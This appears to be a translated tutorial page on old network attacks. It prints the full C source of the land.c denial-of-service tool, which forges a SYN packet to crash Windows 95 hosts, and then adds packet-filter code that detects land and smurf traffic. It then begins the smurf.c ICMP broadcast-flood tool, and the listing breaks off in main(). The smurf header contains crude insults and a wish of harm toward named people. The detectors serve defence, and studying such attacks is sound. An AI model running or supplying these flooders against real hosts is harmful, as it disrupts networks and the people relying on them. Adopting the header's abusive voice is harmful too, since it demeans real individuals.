Common attack programs
Abstract
These are some old attack programs. They seem useless now, but they are all famous.
1 Land
Attacks a Win95 machine by exploiting a vulnerability in Win95.
If a connection request (SYN) is sent to the machine with its own address and the same port as both source and destination, Win95 crashes.
/* land.c by m3lt, FLC
   crashes a win95 box */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

// The pseudo header used for the TCP checksum
struct pseudohdr
{
    struct in_addr saddr;
    struct in_addr daddr;
    u_char zero;
    u_char protocol;
    u_short length;
    struct tcphdr tcpheader;
};

// Calculate the IP checksum
u_short checksum(u_short *data, u_short length)
{
    register long value = 0;
    u_short i;

    for (i = 0; i < (length >> 1); i++)
        value += data[i];
    if ((length & 1) == 1)
        value += (data[i] << 8);
    value = (value & 65535) + (value >> 16);
    return (~value);
}

int main(int argc, char **argv)
{
    struct sockaddr_in sin;
    struct hostent *hoste;
    int sock;
    char buffer[40];
    struct iphdr *ipheader = (struct iphdr *) buffer;
    struct tcphdr *tcpheader = (struct tcphdr *) (buffer + sizeof(struct iphdr));
    struct pseudohdr pseudoheader;

    fprintf(stderr, "land.c by m3lt, FLC\n");
    if (argc < 3)
    {
        fprintf(stderr, "usage: %s IP port\n", argv[0]);
        return (-1);
    }
    bzero(&sin, sizeof(struct sockaddr_in));
    sin.sin_family = AF_INET;
    if ((hoste = gethostbyname(argv[1])) != NULL)
        bcopy(hoste->h_addr, &sin.sin_addr, hoste->h_length);
    else if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == -1)
    {
        fprintf(stderr, "unknown host %s\n", argv[1]);
        return (-1);
    }
    if ((sin.sin_port = htons(atoi(argv[2]))) == 0)
    {
        fprintf(stderr, "unknown port %s\n", argv[2]);
        return (-1);
    }
    // Create a SOCK_RAW socket to build the forged IP packet; this requires root privileges
    if ((sock = socket(AF_INET, SOCK_RAW, 255)) == -1)
    {
        fprintf(stderr, "couldnt allocate raw socket\n");
        return (-1);
    }
    bzero(&buffer, sizeof(struct iphdr) + sizeof(struct tcphdr));
    ipheader->version = 4;
    ipheader->ihl = sizeof(struct iphdr) / 4;
    ipheader->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr));
    ipheader->id = htons(0xF1C);
    ipheader->ttl = 255;
    ipheader->protocol = IP_TCP;
    // The destination IP address and the source IP address are the same
    ipheader->saddr = sin.sin_addr.s_addr;
    ipheader->daddr = sin.sin_addr.s_addr;
    // The destination TCP port is the same as the source TCP port
    tcpheader->th_sport = sin.sin_port;
    tcpheader->th_dport = sin.sin_port;
    tcpheader->th_seq = htonl(0xF1C);
    tcpheader->th_flags = TH_SYN;
    tcpheader->th_off = sizeof(struct tcphdr) / 4;
    tcpheader->th_win = htons(2048);
    bzero(&pseudoheader, 12 + sizeof(struct tcphdr));
    pseudoheader.saddr.s_addr = sin.sin_addr.s_addr;
    pseudoheader.daddr.s_addr = sin.sin_addr.s_addr;
    pseudoheader.protocol = 6;
    pseudoheader.length = htons(sizeof(struct tcphdr));
    bcopy((char *) tcpheader, (char *) &pseudoheader.tcpheader, sizeof(struct tcphdr));
    tcpheader->th_sum = checksum((u_short *) &pseudoheader, 12 + sizeof(struct tcphdr));
    if (sendto(sock, buffer, sizeof(struct iphdr) + sizeof(struct tcphdr),
               0, (struct sockaddr *) &sin, sizeof(struct sockaddr_in)) == -1)
    {
        fprintf(stderr, "couldnt send packet\n");
        return (-1);
    }
    fprintf(stderr, "%s:%s landed\n", argv[1], argv[2]);
    close(sock);
    return (0);
}
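The packet built above has one distinguishing property a filter can test for: source and destination address are equal, and so are the two TCP ports. The following check is an added example, not part of the original program; the function name `is_land_packet` and the sample packets (documentation addresses, truncated after the ports) are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Read a big-endian 16-bit field byte by byte (no alignment assumptions). */
static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Returns 1 when pkt (starting at the IPv4 header, as captured from the wire)
 * is a TCP segment whose source and destination address and port are equal. */
int is_land_packet(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return 0;                              /* truncated or not IPv4 */
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < 20 || len < ihl + 4)
        return 0;                              /* bad IHL or ports missing */
    if (pkt[9] != 6 || (be16(pkt + 6) & 0x1fff) != 0)
        return 0;                              /* not TCP, or a later fragment */
    if (memcmp(pkt + 12, pkt + 16, 4) != 0)
        return 0;                              /* saddr differs from daddr */
    return be16(pkt + ihl) == be16(pkt + ihl + 2);   /* sport == dport */
}

/* Constructed samples: 20-byte IPv4 header plus the first 4 TCP bytes (ports). */
const uint8_t sample_normal[24] = {
    0x45, 0, 0, 40, 0, 0, 0, 0, 64, 6, 0, 0,
    198, 51, 100, 7,   192, 0, 2, 10,          /* saddr, daddr */
    0xc0, 0x01,  0x00, 0x8b };                 /* sport 49153, dport 139 */
const uint8_t sample_land[24] = {
    0x45, 0, 0, 40, 0, 0, 0, 0, 255, 6, 0, 0,
    192, 0, 2, 10,     192, 0, 2, 10,          /* saddr == daddr */
    0x00, 0x8b,  0x00, 0x8b };                 /* sport == dport == 139 */
const uint8_t sample_same_port[24] = {         /* equal ports, different hosts */
    0x45, 0, 0, 40, 0, 0, 0, 0, 64, 6, 0, 0,
    198, 51, 100, 7,   192, 0, 2, 10,
    0x00, 0x8b,  0x00, 0x8b };

int main(void)
{
    printf("normal=%d land=%d same_port=%d\n",
           is_land_packet(sample_normal, sizeof sample_normal),
           is_land_packet(sample_land, sizeof sample_land),
           is_land_packet(sample_same_port, sizeof sample_same_port));
    return 0;
}
```

The check is meant for packets arriving on a network interface, where a source address equal to the destination is never legitimate.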
2 Smurf
The smurf attack is very simple: it takes a list of IP broadcast addresses and sends forged ICMP echo requests to them, which causes a broadcast storm. The forged packets carry the victim host's address as their source.
There are two types of victims: the intermediate devices (the bounce sites, switches or routers) and the spoofed IP address (all the ICMP echo packets are sent to it). The attack relies on routers converting an IP broadcast address into a broadcast on the subnet (for example, Ethernet FF:FF:FF:FF:FF:FF). The RFC allows this type of conversion, but it does not seem necessary today.
You can disable the conversion of layer-3 (IP) broadcasts to layer-2 (Ethernet) broadcasts on the router.
However, an SMB server or NT host needs remote broadcasts to make the LAN aware of its existence, and the router configuration above makes that impossible (when there is no WINS server).
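The router-side decision described above, as an added example that is not part of the original page: recognise an ICMP echo request addressed to the directed-broadcast address of an attached subnet, so that it is not turned into a layer-2 broadcast. The function names, the subnet 192.0.2.0 and the sample packets are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define NET_192_0_2_0 UINT32_C(0xC0000200)    /* constructed: 192.0.2.0 */

/* 1 if addr is the directed-broadcast address of the subnet net/prefix. */
int is_directed_broadcast(uint32_t addr, uint32_t net, unsigned prefix)
{
    if (prefix == 0 || prefix >= 31)
        return 0;                 /* /31 and /32 have no broadcast address */
    uint32_t mask = UINT32_C(0xffffffff) << (32 - prefix);
    return (addr & mask) == (net & mask) && (addr | mask) == UINT32_C(0xffffffff);
}

/* 1 if pkt (starting at the IPv4 header) is an ICMP echo request addressed to
 * the directed broadcast of the attached subnet net/prefix. */
int echo_to_directed_broadcast(const uint8_t *pkt, size_t len,
                               uint32_t net, unsigned prefix)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return 0;                 /* truncated or not IPv4 */
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < 20 || len < ihl + 1)
        return 0;                 /* bad IHL or ICMP type byte missing */
    if (pkt[9] != 1 || (pkt[6] & 0x1f) != 0 || pkt[7] != 0 || pkt[ihl] != 8)
        return 0;                 /* not ICMP, later fragment, or not echo request */
    uint32_t dst = ((uint32_t)pkt[16] << 24) | ((uint32_t)pkt[17] << 16) |
                   ((uint32_t)pkt[18] << 8) | pkt[19];
    return is_directed_broadcast(dst, net, prefix);
}

/* Constructed samples: IPv4 header plus the ICMP type byte (8 = echo request). */
const uint8_t echo_bcast[21] = { 0x45,0,0,28, 0,0,0,0, 64,1,0,0,
    198,51,100,7,  192,0,2,255,  8 };          /* dst is the /24 broadcast */
const uint8_t echo_host[21]  = { 0x45,0,0,28, 0,0,0,0, 64,1,0,0,
    198,51,100,7,  192,0,2,10,   8 };          /* dst is an ordinary host */
const uint8_t echo_half[21]  = { 0x45,0,0,28, 0,0,0,0, 64,1,0,0,
    198,51,100,7,  192,0,2,127,  8 };          /* broadcast only under /25 */

int main(void)
{
    printf("bcast/24=%d host/24=%d .127/24=%d .127/25=%d\n",
           echo_to_directed_broadcast(echo_bcast, 21, NET_192_0_2_0, 24),
           echo_to_directed_broadcast(echo_host, 21, NET_192_0_2_0, 24),
           echo_to_directed_broadcast(echo_half, 21, NET_192_0_2_0, 24),
           echo_to_directed_broadcast(echo_half, 21, NET_192_0_2_0, 25));
    return 0;
}
```

Whether an address is a directed broadcast depends on the prefix length of the attached subnet, which is why the decision belongs on the last-hop router rather than on a remote filter.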
/*
*
* $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $
*
* Spoofs icmp packets from a host to various broadcast addresses resulting
* in multiple replies to that host from a single packet.
*
* Mad head:
* Nyt, soldier, autopsy, legendnet, # c0de, irq for being my guinea pig,
* MissSatan for swallowing, napster for pimping my sister, the guy that
* Incluted vaseline, fyber for trying, knowy, old school # havok, kain
* Cos he rox my sox, zuez, toxik, robocod, and everyone else that I might
* Have missed (you know who you are ).
*
* Hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy
* Thing he is (hes-almost-as stubborn as me, still I managed to pick up
* Half the cheque ).
*
* And a special hi to Todd, face it dude, youre fucking awesome.
*
* Mad anal:
* # Madcrew/# conflict for not cashing in their cluepons, EFnet IRCOps
* Because they plain suck, Rolex for being a twit, everyone that
* Trades warez, Caren for being a lesbian hoe, AcidKill for being her
* Partner, # cha0s, sedriss for having an ego in inverse proportion
* His penis and anyone that cant pee standing up -- you dont know what
* Your missing out on.
*
* And anyone thats ripped my code (diff smurf.c axcast.c is rather
* interesting).
*
* And a huge twice the size of soldiers fuck to amm fuck you to Bill
* Robbins for trying to steal my girlfriend. Not only did you show me
* No respect but youre a manipulating prick who tried to take away
* Most important thing in the world to me with no guilt whatsoever, and
* For that I wish you nothing but pain. Die.
*
* Disclaimer:
* I cannot and will not be held responsible nor legally bound for
* malicious activities of individuals who come into possession of this
* program and I refuse to provide help or support of any kind and do NOT
* condone use of this program to deny service to anyone or any machine.
* This is for educational use only. Please Dont abuse this.
*
* Well, I really, really, hate this code, but yet here I am creating another
* disgusting version of it. Odd, indeed. So why did I write it? Well, I,
* like most programmers dont like seeing bugs in their code. I saw a few
* things that should have been done better or needed fixing so I fixed
* them. -shrug-, programming for me as always seemed to take the pain away
* ...
*
*
*/
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>

void banner(void);
void usage(char *);
void smurf(int, struct sockaddr_in, u_long, int);
void ctrlc(int);
unsigned short in_chksum(u_short *, int);

/* stamp */
char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";

int main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct hostent *he;